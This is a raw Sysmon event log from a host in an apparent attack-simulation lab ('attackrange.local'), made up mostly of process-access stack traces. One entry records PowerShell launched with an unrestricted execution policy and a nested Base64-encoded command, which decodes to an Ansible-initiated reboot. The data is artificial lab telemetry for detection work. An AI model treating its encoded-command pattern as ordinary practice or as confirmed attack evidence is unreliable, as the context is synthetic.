13:52:27.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000527Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000526Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000525Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000524Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000523Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000522Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000521Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000520Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-DE02-000000009001}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000519Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-851B-5FCF-DD02-000000009001}27604224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-851B-5FCF-DE02-000000009001}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd2d2519(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc773123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc772df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd2246d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc73398a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc791e59(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7754be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7754be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc77534f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7672d4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc773807(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7733fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc773123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc772df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd2246d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc759c55(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc759225(wow64) 154100x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.717{10ACEC4A-851B-5FCF-DE02-000000009001}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-15E5-100000000000}0x10e5150HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-851B-5FCF-DD02-000000009001}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000517Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.649{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-851B-5FCF-DD02-000000009001}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000516Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.649{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-851B-5FCF-DD02-000000009001}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000515Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.618{10ACEC4A-851B-5FCF-DD02-000000009001}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2vnvv14z.1nt.ps12020-12-08 13:52:27.618 10341000x8000000000000000514Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-DD02-000000009001}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000513Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-851B-5FCF-D902-000000009001}45203012C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-DD02-000000009001}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000512Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000511Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000510Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000509Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000508Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 